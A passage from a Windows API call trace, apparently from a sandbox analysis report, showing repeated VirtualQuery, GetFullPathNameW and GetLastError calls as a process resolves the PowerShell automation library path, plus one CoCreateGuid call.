dwLength=0x1c | out: lpBuffer=0x23e1f0*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.222] GetLastError () returned 0x0 [0152.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.222] GetLastError () returned 0x0 [0152.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.222] GetLastError () returned 0x0 [0152.222] VirtualQuery (in: lpAddress=0x23d1f0, lpBuffer=0x23e1f0, dwLength=0x1c | out: lpBuffer=0x23e1f0*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.222] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.223] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.223] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.224] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.224] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.224] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.225] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.225] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.226] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.226] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.227] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.227] VirtualQuery (in: lpAddress=0x23d02c, lpBuffer=0x23e02c, dwLength=0x1c | out: lpBuffer=0x23e02c*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.227] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.228] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.228] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.228] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.228] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xc046b6be, Data2=0x167b, Data3=0x4047, Data4=([0]=0x8c, [1]=0xac, [2]=0x6b, [3]=0x97, [4]=0x14, [5]=0xa7, [6]=0x0, [7]=0x23))) returned 0x0 [0152.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.229] GetLastError () returned 0x0 [0152.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.229] GetLastError () returned 0x0 [0152.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.229] GetLastError () returned 0x0 [0152.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.229] GetLastError () returned 0x0 [0152.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.229] GetLastError () returned 0x0 [0152.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.229] GetLastError () returned 0x0 [0152.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.229] GetLastError () returned 0x0 [0152.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.229] GetLastError () returned 0x0 [0152.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.229] GetLastError () returned 0x0 [0152.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.230] GetLastError () returned 0x0 [0152.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.230] GetLastError () returned 0x0 [0152.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.230] GetLastError () returned 0x0 [0152.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.230] GetLastError () returned 0x0 [0152.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.230] GetLastError () returned 0x0 [0152.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.230] GetLastError () returned 0x0 [0152.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.230] GetLastError () returned 0x0 [0152.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.230] GetLastError () returned 0x0 [0152.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.230] GetLastError () returned 0x0 [0152.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.230] GetLastError () returned 0x0 [0152.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.231] GetLastError () returned 0x0 [0152.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.231] GetLastError () returned 0x0 [0152.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.231] GetLastError () returned 0x0 [0152.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.231] GetLastError () returned 0x0 [0152.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.231] GetLastError () returned 0x0 [0152.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.231] GetLastError () returned 0x0 [0152.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.231] GetLastError () returned 0x0 [0152.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.231] GetLastError () returned 0x0 [0152.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.231] GetLastError () returned 0x0 [0152.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.231] GetLastError () returned 0x0 [0152.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.231] GetLastError () returned 0x0 [0152.231] VirtualQuery (in: lpAddress=0x23d1f0, lpBuffer=0x23e1f0, dwLength=0x1c | out: lpBuffer=0x23e1f0*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.232] GetLastError () returned 0x0 [0152.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.232] GetLastError () returned 0x0 [0152.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.232] GetLastError () returned 0x0 [0152.232] VirtualQuery (in: lpAddress=0x23d1f0, lpBuffer=0x23e1f0, dwLength=0x1c | out: lpBuffer=0x23e1f0*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.232] GetLastError () returned 0x0 [0152.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.232] GetLastError () returned 0x0 [0152.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.232] GetLastError () returned 0x0 [0152.233] VirtualQuery (in: lpAddress=0x23d1f0, lpBuffer=0x23e1f0, dwLength=0x1c | out: lpBuffer=0x23e1f0*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.233] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.233] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.234] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.235] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.235] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.235] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.235] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.235] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.235] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.236] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.236] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.236] VirtualQuery (in: lpAddress=0x23d02c, lpBuffer=0x23e02c, dwLength=0x1c | out: lpBuffer=0x23e02c*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.237] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.237] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.237] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.238] VirtualQuery (in: lpAddress=0x23d1c4, lpBuffer=0x23e1c4, dwLength=0x1c | out: lpBuffer=0x23e1c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.238] CoCreateGuid (in: 